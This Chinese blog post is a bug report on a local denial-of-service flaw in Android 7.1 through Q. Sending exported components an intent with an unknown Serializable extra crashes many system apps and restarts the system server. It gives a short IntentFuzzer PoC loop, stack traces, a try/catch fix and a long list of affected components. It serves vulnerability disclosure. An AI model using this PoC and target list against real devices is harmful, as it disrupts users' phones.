-->

时时勤拂拭,勿使惹尘埃

TOC

Categories

bugreport_Android序列化参数intent导致的大量系统app崩溃重启通用bug


0x0 描述

通过IntentFuzzer工具对最新版android 9.0.0进行fuzz测试,发现诸多系统app皆存在同样的bug,可以让大部分app直接崩溃,最严重的可以让桌面(android:ui)直接重启。
这个问题可能存在于大量设备的大部分版本里面,目前我只测试了pixel_salifish的7.1.0 (NDE63H, Oct 2016)、8.1.0 (OPM4.171019.021.P1, Jul 2018)、9.0.0 (PPR2.181005.003.A1, Nov 2018)和master分支的aosp_salifish-userdebug Q PI eng.amd.20181105.110826 test-keys,这些版本均存在此类问题。

0x1 示例版本

设备:pixel(salifish)
版本号:android 9.0.0(PPR2.181005.003.A1, Nov 2018)
即官方(https://developers.google.com/android/images#sailfish)目前最新版本:

0x2 POC

基于开源的IntentFuzzer工具,主要攻击代码如下,对暴露的组件发送带序列化参数“test”的intent,少部分发送空intent也会导致崩溃:
 fuzzAllSeBtn.setOnClickListener(new OnClickListener(){
   @Override
   public void onClick(View v) {
    // TODO Auto-generated method stub
    for(ComponentName cmpName : components){
     Intent intent = new Intent();
     intent.setComponent(cmpName);
     intent.putExtra("test", new SerializableTest());
     if (sendIntentByType(intent, currentType)) {
      Toast.makeText(FuzzerActivity.this, "Sent Serializeable " + intent, Toast.LENGTH_LONG).show();
     } else {
      Toast.makeText(FuzzerActivity.this, R.string.send_faild, Toast.LENGTH_LONG).show();
     }
    }
   }

     });

0x3 bug原因

当app接收到带序列化参数的intent时,如果代码中读取了参数,即便不使用读取序列化方式(readSerializable),仅仅如下图普通方式,依然会去实例序列化对象:
@  Override
protected void onCreate(Bundle savedInstanceState){
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    ButterKnife.bind(target:this);

    getIntent().getIntExtra(name:"1234",defaultValue:1);
}
源码如下:
app接收到intent后,会通过Parcel.java相关代码进行解析,其中readVaule()方法会通过readInt()来读取参数类型:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/os/Parcel.java
    /**
     * Read a typed object from a parcel.  The given class loader will be
     * used to load any enclosed Parcelables.  If it is null, the default class
     * loader will be used.
     */
    public final Object readValue(ClassLoader loader) {
        int type = readInt();
        switch (type) {
        case VAL_NULL:
            return null;
        case VAL_STRING:
            return readString();
        ...
        case VAL_BYTE:
            return readByte();
//如果readInt()读取到值类型为`VAL_SERIALIZABLE`,则会调用readSerializable(loader)来解析intent参数
        case VAL_SERIALIZABLE:
            return readSerializable(loader);
        case VAL_PARCELABLEARRAY:
            return readParcelableArray(loader);
        ...
之后就会执行到BaseDexClassLoader的findClass,而findClass无法找到对象,从而抛出异常,最终app崩溃,部分进程如桌面(android:ui)崩溃后会重启
这意味着只要故意给目标app发一个不包含的class就会崩溃,这是一个通用问题。
app崩溃时第一个异常栈回溯如下:
Caused by: java.lang.ClassNotFoundException: Didn't find class "com.weiqing.fuzzer.util.Utils$2" on path: DexPathList[[zip file "/data/app/com.weiqing.test-2/base.apk"],nativeLibraryDirectories=[/data/app/com.weiqing.test-2/lib/arm64, /data/app/com.weiqing.test-2/base.apk!/lib/arm64-v8a, /system/lib64, /vendor/lib64]]
    at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56) 
    at java.lang.ClassLoader.loadClass(ClassLoader.java:380)
    at java.lang.ClassLoader.loadClass(ClassLoader.java:312)
    at java.lang.Class.classForName(Native Method)
    at java.lang.Class.forName(Class.java:400)
    at android.os.Parcel$2.resolveClass(Parcel.java:2616)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1613)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1518)
    at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1772)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
    at android.os.Parcel.readSerializable(Parcel.java:2624)
    at android.os.Parcel.readValue(Parcel.java:2416)
    at android.os.Parcel.readArrayMapInternal(Parcel.java:2732)
    at android.os.BaseBundle.unparcel(BaseBundle.java:271)
    at android.os.BaseBundle.getInt(BaseBundle.java:876)
    at android.content.Intent.getIntExtra(Intent.java:6194)
    at com.weiqing.test.MainActivity.onCreate(MainActivity.java:47)
    at android.app.Activity.performCreate(Activity.java:6684)
    at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1119)
    at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2637)
    at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2751)
    at android.app.ActivityThread.-wrap12(ActivityThread.java)
    at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1496)
    at android.os.Handler.dispatchMessage(Handler.java:102)
    at android.os.Looper.loop(Looper.java:154)
    at android.app.ActivityThread.main(ActivityThread.java:6186)
    at java.lang.reflect.Method.invoke(Native Method)
    at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:889)
    at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:779)

0x4 修复建议

0x41 app层

所有app均添加异常处理,即可避免崩溃(BaseDexClassLoader依然会抛出异常)
@  Override
protected void onCreate(Bundle savedInstanceState){
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    ButterKnife.bind(target:this);

    try{
        getIntent().getIntExtra(name:"1234",defaultValue:1);
    }catch(Exception e){
        e.printStackTrace();
    }
}

0x42 系统层

建议从系统层入手,但我的代码能力薄弱,给不了有效建议。

0x5 发现的问题

0x51 桌面(android:ui)崩溃重启

问题组件:android/com.android.internal.app.IntentForwarderActivity
崩溃日志:(logcat过滤指令: logcat -s *:E | grep FATAL -A 10)
11-29 18:48:42.499  4637  4637 E AndroidRuntime: *** FATAL EXCEPTION IN SYSTEM PROCESS: main
11-29 18:48:42.499  4637  4637 E AndroidRuntime: java.lang.RuntimeException: Unable to start activity ComponentInfo{android/com.android.internal.app.IntentForwarderActivity}: java.lang.RuntimeException: Parcelable encountered ClassNotFoundException reading a Serializable object (name = com.android.intentfuzzer.util.SerializableTest)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2913)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:3048)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.servertransaction.LaunchActivityItem.execute(LaunchActivityItem.java:78)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.servertransaction.TransactionExecutor.executeCallbacks(TransactionExecutor.java:108)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:68)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1808)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.os.Handler.dispatchMessage(Handler.java:106)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at android.os.Looper.loop(Looper.java:193)
11-29 18:48:42.499  4637  4637 E AndroidRuntime:    at com.android.server.SystemServer.run(SystemServer.java:454)
--
11-29 18:48:42.644  6211  6211 E AndroidRuntime: FATAL EXCEPTION: main
11-29 18:48:42.644  6211  6211 E AndroidRuntime: Process: com.android.intentfuzzer, PID: 6211
11-29 18:48:42.644  6211  6211 E AndroidRuntime: DeadSystemException: The system died; earlier logs will point to the root cause
11-29 18:48:42.647   644  1689 E locSvc_FlpAdapter: E/void FlpLocationAdapter::offloadStopFlpSessionRequest(const FlpSessionKey &):1027]: there is no active flp session at all
11-29 18:48:42.647  5934  8248 E AndroidRuntime: FATAL EXCEPTION: IntentService[DropBoxEntryAddedChimeraService]
11-29 18:48:42.647  5934  8248 E AndroidRuntime: Process: com.google.android.gms, PID: 5934
11-29 18:48:42.647  5934  8248 E AndroidRuntime: java.lang.NullPointerException: Attempt to invoke virtual method 'ofi nvu.c()' on a null object reference
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at com.google.android.gms.stats.service.DropBoxEntryAddedChimeraService.onHandleIntent(:[email protected]@12.8.62 (100408-199405334):487)
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at dcb.handleMessage(Unknown Source:6)
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at android.os.Handler.dispatchMessage(Handler.java:106)
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at android.os.Looper.loop(Looper.java:193)
11-29 18:48:42.647  5934  8248 E AndroidRuntime:    at android.os.HandlerThread.run(HandlerThread.java:65)
11-29 18:48:42.649  5934  8248 E BaseUncaughtHandler: Hit an exception while processing the UncaughtExceptionHandler. Original exception:
11-29 18:48:42.649  5934  8248 E BaseUncaughtHandler: java.lang.NullPointerException: Attempt to invoke virtual method 'ofi nvu.c()' on a null object reference
11-29 18:48:42.649  5934  8248 E BaseUncaughtHandler:   at com.google.android.gms.stats.service.DropBoxEntryAddedChimeraService.onHandleIntent(:[email protected]@12.8.62 (100408-199405334):487)
--
11-29 18:48:42.674  6292  6292 E AndroidRuntime: FATAL EXCEPTION: main
11-29 18:48:42.674  6292  6292 E AndroidRuntime: Process: com.android.vending, PID: 6292
11-29 18:48:42.674  6292  6292 E AndroidRuntime: DeadSystemException: The system died; earlier logs will point to the root cause
11-29 18:48:42.870  4585  4585 E Zygote  : Exit zygote because system server (4637) has terminated
11-29 18:48:42.951   633   633 E Diag_Lib: BluetoothDeathRecipient: Calling HAL close
11-29 18:48:43.131  8277  8285 E CameraService: onDeviceStatusChanged: State transition to the same status 0x1 not allowed
11-29 18:48:43.131  8277  8285 E CameraService: onDeviceStatusChanged: State transition to the same status 0x1 not allowed
11-29 18:48:43.172  8279  8279 E Netd    : Error adding route 0.0.0.0/0 -> (null) dummy0 to table 1003: File exists
11-29 18:48:43.173  8279  8279 E Netd    : Unable to create netlink socket: Protocol not supported
11-29 18:48:43.330   661  5729 E NxpHal  : Ignoring read, HAL close triggered
11-29 18:48:43.667  8274  8274 E Typeface: Error mapping font file /system/fonts/NotoSerifEthiopic-Regular.otf

0x52 诸多app崩溃

Apps Problem components intent type
android android/com.android.internal.app.ConfirmUserCreationActivity Null/Serializable
com.google.android.carriersetup com.google.android.carriersetup/com.google.android.carriersetup.VzwSetupActivity Serializable
com.android.cts.priv.ctsshim com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewAuthority Null/Serializable
com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewScheme Null/Serializable
com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.UpgradeNewCategory Null/Serializable
com.android.cts.priv.ctsshim/com.android.cts.priv.ctsshim.InstallPriority Null/Serializable
almost all activity Null/Serializable
com.google.android.youtube com.google.android.youtube/com.google.android.apps.youtube.app.application.Shell$SettingsActivity Serializable
com.google.android.googlequicksearchbox com.google.android.googlequicksearchbox/com.google.android.apps.gsa.staticplugins.opa.hq.ResizableOpaHqActivity Serializable
com.google.android.googlequicksearchbox/com.google.android.apps.gsa.velour.DynamicActivityTrampoline Serializable
com.google.android.googlequicksearchbox/com.google.android.apps.gsa.speech.setupwizard.HotwordSetupWizardActivity Serializable
com.google.android.apps.gsa.bloblobber.receiver.BlobDownloadedReceiver Serializable
com.google.android.apps.gsa.search.core.location.LocationReceiver Serializable
android.process.media com.android.providers.media.MediaScannerReceiver Null
MediaScannerService Serializable
com.qti.service.colorservice com.qti.service.colorservice Null/Serializable
com.android.documentsui com.android.documentsui/com.android.documentsui.ScopedAccessActivity Serializable
com.android.htmlviewer com.android.htmlviewer/com.android.htmlviewer.HTMLViewerActivity Serializable
com.google.android.apps.multidevice.client com.google.android.apps.multidevice.client/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.apps.multidevice.client/com.google.android.apps.multidevice.client.ui.pixel.SetupActivity Serializable
com.google.android.apps.multidevice.client.connection.PixelInitializer Serializable
com.google.android.apps.messaging com.google.android.apps.messaging/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.apps.messaging/com.google.android.apps.messaging.ui.WidgetPickConversationActivity Serializable
com.google.android.apps.messaging/com.google.firebase.iid.FirebaseInstanceIdService Serializable
com.google.android.apps.messaging.shared.experiments.BuglePhenotypeBroadcastReceiver Serializable
com.google.android.apps.messaging/com.google.firebase.messaging.FirebaseMessagingService Serializable
com.google.android.soundpicker com.google.android.soundpicker/com.google.android.soundpicker.PickerActivity Serializable
com.google.android.configupdater com.google.android.configupdater.CertPin.CertPinUpdateRequestReceiver Serializable
com.google.android.configupdater.NetworkWatchlist.NetworkWatchlistUpdateRequestReceiver Serializable
com.android.vending com.android.vending/com.google.android.wallet.instrumentmanager.redirect.ImFinishAndroidAppRedirectActivity Serializable
com.android.vending/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.vending/com.google.android.finsky.family.setup.FamilySetupActivity Serializable
com.android.vending/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.finsky.setup.LauncherConfigurationReceiver Serializable
com.android.vending/com.google.firebase.iid.FirebaseInstanceIdService Serializable
com.android.certinstaller com.android.certinstaller/com.android.certinstaller.CertInstallerMain Serializable
com.google.android.marvin.talkback com.google.android.marvin.talkback/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.egg com.android.egg.octo.Ocquarium Serializable
com.android.egg.neko.NekoLand Serializable
com.android.egg.neko.NekoActivationActivity Serializable
com.android.mtp com.android.mtp/com.android.mtp.ReceiverActivity Serializable
com.android.mtp.UsbIntentReceiver Null/Serializable
com.android.nfc com.android.nfc.BeamShareActivity Serializable
com.google.android.deskclock com.google.android.deskclock/com.android.deskclock.DeskClock Serializable
com.android.alarmclock.DigitalAppWidgetProvider Null/Serializable
com.qualcomm.qti.radioconfiginterface RadioConfigService Null/Serializable
com.google.android.as com.google.android.as/com.google.android.apps.miphone.aiai.settings.ui.SettingsActivity Serializable
com.google.android.gm com.google.android.gm/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.gm/com.google.android.gm.CreateShortcutActivityGmail Serializable
com.google.android.gm/com.google.android.gm.ComposeActivityGmailExternal Serializable
com.android.email.service.EmailBroadcastReceiver Null/Serializable
com.google.android.carrier com.google.android.carrier.CarrierSettingsReceiver Null/Serializable
com.qualcomm.qti.auth.secureextauthservice com.qualcomm.qti.auth.secureextauthservice.SecureExtAuthService Null/Serializable
com.google.android.setupwizard com.google.android.setupwizard/com.google.android.setupwizard.predeferred.PreDeferredSetupWizardActivity Serializable
com.google.android.setupwizard/com.google.android.setupwizard.user.GoogleServicesWrapper Serializable
com.google.android.setupwizard/com.google.android.setupwizard.WizardManagerActivity Null/Serializable
com.google.android.setupwizard/com.google.android.setupwizard.predeferred.PreDeferredSetupWizardActivity Serializable
com.google.android.music com.google.android.music/com.google.android.gms.appinvite.PreviewActivity Serializable
com.google.android.music/com.google.android.music.ui.navigation.AppNavigationTrampolineActivity Null/Serializable
com.google.android.music/com.google.android.gms.appinvite.PreviewActivity Serializable
com.google.android.music/com.google.android.music.ui.navigation.ShortcutTrampolineActivity Null/Serializable
com.google.android.dialer com.google.android.dialer/com.android.incallui.telecomeventui.InternationalCallOnWifiDialogActivity Serializable
com.google.android.dialer/com.google.android.apps.dialer.main.GoogleMainActivity Serializable
com.android.voicemail.VoicemailSecretCodeReceiver Null
com.google.android.apps.cloudprint com.google.android.apps.cloudprint/android.app.AliasActivity Serializable
com.google.android.apps.cloudprint/com.google.android.apps.cloudprint.printdialog.AdvancedPrintOptionsActivity Null/Serializable
com.android.musicfx com.android.musicfx/com.android.musicfx.Compatibility$Redirector Serializable
com.android.musicfx/com.android.musicfx.ActivityMusic Serializable
com.android.musicfx.ControlPanelReceiver Serializable
com.android.musicfx.Compatibility$Receiver Null
com.google.android.apps.maps com.google.android.apps.maps/com.google.android.gms.appinvite.PreviewActivity Serializable
com.google.android.apps.maps/com.google.android.apps.gmm.car.firstrun.GmmProjectedFirstRunActivity Serializable
com.google.android.apps.maps/com.google.android.libraries.abuse.reporting.ReportAbuseActivity Null
com.google.android.apps.gmm.traffic.notification.service.TrafficToPlaceNotificationGeofenceReceiver Serializable
com.google.android.markup com.google.android.markup/com.google.android.markup.AnnotateActivity Serializable
com.android.cellbroadcastreceiver com.android.cellbroadcastreceiver.CellBroadcastListActivity Serializable
com.android.cellbroadcastreceiver.CellBroadcastSettings Serializable
com.google.android.contacts com.google.android.contacts/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.keychain com.android.keychain/com.android.keychain.KeyChainActivity Serializable
com.google.android.calculator com.google.android.calculator2.Calculator Serializable
com.google.android.calculator2.Licenses Serializable
com.android.chrome com.android.chrome/com.android.webview.chromium.LicenseActivity Serializable
com.android.chrome/org.chromium.chrome.browser.browseractions.BrowserActionActivity Serializable
com.qualcomm.qti.rcsbootstraputil com.qualcomm.qti.rcsbootstraputil.RCSReceiver Null/Serializable
com.google.android.packageinstaller com.google.android.packageinstaller/com.android.packageinstaller.InstallStart Serializable
com.google.android.gms com.google.android.gms/com.google.firebase.auth.api.gms.ui.BrowserSignInResponseHandlerActivity Null
com.google.android.gms/com.google.android.gms.matchstick.ui.ConversationListActivity Null
com.google.android.gms/com.google.android.gms.wallet.buyflow.CheckoutActivity Null
com.google.android.gms/com.google.android.gms.smartdevice.magicwand.MagicWandActivity Null
com.google.android.gms/com.google.android.gms.googlehelp.contact.chat.ChatSupportRequestFormActivity Null
com.google.android.gms/com.google.android.gms.auth.api.credentials.ui.CredentialsSaveConfirmationActivity Null
com.google.android.gms/com.google.android.gms.family.v2.invites.SendInvitationsActivity Serializable
com.google.android.gms/com.google.android.gms.trustagent.discovery.OnbodyPromotionActivity Serializable
com.google.android.gms/com.google.android.gms.tapandpay.settings.TapAndPaySettingsActivity Serializable
com.google.android.gms/com.google.android.gms.matchstick.call.CallEntryActivity Serializable
com.google.android.gms/com.google.android.gms.locationsharing.activity.OnboardingActivity Serializable
com.google.android.gms/com.google.android.gms.instantapps.settings.SettingsActivity Serializable
com.google.android.gms/com.google.android.gms.games.PlayGamesUpgradeActivity Serializable
com.google.android.gms/com.google.android.gms.car.FirstActivity Serializable
com.google.android.gms/com.google.android.gms.backup.component.BackupSettingsActivity Serializable
com.google.android.gms.auth.api.credentials.openyolo.provider.CredentialQueryReceiver Serializable
com.google.android.gms.checkin.CheckinServiceTriggerReceiver Serializable
com.google.android.gms.gcm.GcmSenderProxy Serializable
com.google.android.gms.update.SystemUpdateServiceActiveReceiver Serializable
com.google.android.libraries.social.autobackup.PicasaQuotaChangedReceiver Serializable
com.google.android.gms.vision.DependencyBroadcastReceiverProxy Serializable
com.google.android.gms.trustagent.BluetoothDeviceBondStateBroadcastReceiver Serializable
com.google.android.gms.checkin.CheckinService Null/Serializable
com.google.android.gms/.fitness.service.recording.FitRecordingBroker Null/Serializable
com.google.android.gms/.carsetup.wifi.CarWifiConnectionService Serializable
com.google.android.gms/com.google.firebase.messaging.FirebaseMessagingService Serializable
com.google.android.gsf com.google.android.gsf/com.google.android.gsf.settings.ConfirmLgaaylActivity Serializable
com.google.android.gsf/com.google.android.gsf.settings.UseLocationForServicesActivity Serializable
com.google.android.tag com.google.android.tag/com.android.apps.tag.TagViewer Serializable
com.google.android.tts com.google.android.tts/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.partnersetup com.google.android.partnersetup.RlzPingBroadcastReceiver Null/Serializable
com.android.safetyregulatoryinfo com.android.safetyregulatoryinfo.SafetyAndRegulatoryInfoActivity Serializable
com.google.android.videos com.google.android.videos/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.videos/com.google.android.videos.presenter.activity.AuxiliaryActivity Serializable
com.google.android.videos.mobile.presenter.activity.RestrictionsActivity$Receiver Serializable
com.google.android.apps.nexuslauncher com.google.android.apps.nexuslauncher.reflection.NewAppInstallReceiver$V26 Null/Serializable
com.android.launcher3.SessionCommitReceiver Null/Serializable
com.android.carrierdefaultapp com.android.carrierdefaultapp.CarrierDefaultBroadcastReceiver Null/Serializable
com.google.SSRestartDetector com.google.SSRestartDetector.SSRHandler Null/Serializable
com.google.android.feedback com.google.android.feedback/com.google.android.feedback.FeedbackActivity Null/Serializable
com.google.android.apps.photos com.google.android.apps.photos/com.google.android.libraries.abuse.reporting.ReportAbuseActivity Null
com.google.android.apps.photos/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.calendar com.google.android.calendar/com.android.calendar.AllInOneActivity Serializable
com.android.managedprovisioning com.android.managedprovisioning/com.android.managedprovisioning.finalization.FinalizationActivity Serializable
com.android.wallpaper.livepicker com.android.wallpaper.livepicker/com.android.wallpaper.livepicker.LiveWallpaperChange Serializable
com.android.settings com.android.settings/com.android.settings.Settings$ManageAppExternalSourcesActivity Null
com.android.settings/com.android.settings.bluetooth.DevicePickerActivity Null
com.android.settings/com.android.settings.Settings$IccLockSettingsActivity Serializable
com.android.settings/com.android.settings.Settings$TextToSpeechSettingsActivity Serializable
com.android.settings/com.android.settings.password.ConfirmDeviceCredentialActivity Serializable
com.android.settings/com.android.settings.Settings$DevelopmentSettingsDashboardActivity Serializable
com.android.settings/com.android.settings.Settings$WifiDisplaySettingsActivity Serializable
com.android.settings/com.android.settings.Settings$UsageAccessSettingsActivity Serializable
com.android.settings/com.android.settings.bluetooth.BluetoothPairingDialog Null
com.android.settings/com.android.settings.applications.InstalledAppDetailsTop Null
com.android.settings.bluetooth.BluetoothPairingRequest Null
com.android.settings/com.android.settings.Settings$ZenModeSettingsActivity Serializable
com.android.settings/com.android.settings.Settings$MobileDataUsageListActivity Serializable
com.android.settings/com.android.settings.Settings$UsageAccessSettingsActivity Serializable
com.google.android.wfcactivation/com.google.android.wfcactivation.WfcActivationActivity Serializable
com.google.android.apps.pixelmigrate com.google.android.apps.pixelmigrate/com.google.android.apps.pixelmigrate.component.CloudRestoreFlowActivity Null
com.google.android.apps.pixelmigrate/com.google.android.apps.pixelmigrate.component.RestoreProgressActivity Serializable
com.google.android.apps.pixelmigrate.util.SetupWizardLifecycleReceiver Serializable
com.google.android.settings.intelligence com.google.android.settings.intelligence/com.google.android.settings.intelligence.modules.suggestions.NightlightTrampolineActivity Serializable
com.google.android.settings.intelligence.libs.experiment.PhenotypeBroadcastReceiver Serializable
com.google.android.tetheringentitlement com.google.android.tetheringentitlement/com.google.android.tetheringentitlement.CarrierEntitlementActivity Serializable
com.android.cts.ctsshim com.android.cts.ctsshim/com.android.cts.ctsshim.InstallPriority Null/Serializable
com.android.vpndialog com.android.vpndialogs/com.android.vpndialogs.ConfirmDialog Serializable
com.google.android.apps.wallpaper com.google.android.apps.wallpaper/com.google.android.apps.wallpaper.picker.StandalonePreviewActivity Serializable
com.google.android.apps.wallpaper.module.GoogleAlarmInitializer Null
com.google.android.talk com.google.android.talk/com.google.android.apps.hangouts.stub.PlayStoreRedirectActivity Serializable
com.android.phone com.android.phone/com.android.phone.NetworkSelectSettingActivity Null
com.android.phone/com.android.phone.settings.VoicemailSettingsActivity Serializable
com.android.services.telephony.sip.SipIncomingCallReceiver Null/Serializable
com.google.vr.vrcore com.google.vr.vrcore/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.emergency all activity Serializable
com.android.systemui com.android.systemui/com.android.systemui.ForegroundServicesDialog Serializable
com.android.systemui/com.android.systemui.SlicePermissionActivity Serializable
com.android.systemui/com.android.systemui.media.MediaProjectionPermissionActivity Serializable
com.android.traceur com.android.traceur.MainActivity Serializable
com.google.android.apps.helprtc com.google.android.apps.helprtc/com.google.android.apps.helprtc.ui.InvitationActivity Serializable
com.google.android.apps.gcs com.google.android.apps.gcs/com.google.android.apps.gcs.WifiAssistantOptInActivity Serializable
com.android.bluetooth com.android.bluetooth.opp.BluetoothOppReceiver Null/Serializable
com.android.bluetooth/.pbap.BluetoothPbapService Serializable
com.android.captiveportallogin com.android.captiveportallogin/com.android.captiveportallogin.CaptivePortalLoginActivity Null/Serializable
com.google.android.GoogleCamera com.google.android.GoogleCamera/com.google.android.apps.camera.legacy.app.activity.CameraDeepLinkActivity Null
com.google.android.GoogleCamera/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.connectivity.metrics com.android.connectivity.metrics.SnapshotSchedulingReceiver Null/Serializable
com.google.android.inputmethod.latin com.google.android.inputmethod.latin/com.google.android.apps.inputmethod.libs.search.sticker.AppIndexingActivity Serializable
com.google.android.gms.analytics.CampaignTrackingReceiver Serializable
com.google.android.storagemanager com.google.android.storagemanager/com.android.storagemanager.deletionhelper.DeletionHelperActivity Serializable

0x6 最后

由于本地crash问题影响太微弱,虽然这是通用型bug,但依然不符合Google对漏洞的定位(DOS类型至少要求系统重启),已经被忽略😂😂😂

1 条评论:

  1. 想请问下,楼主对于Android漏洞挖掘有什么比较好用开源工具可以介绍吗

    回复删除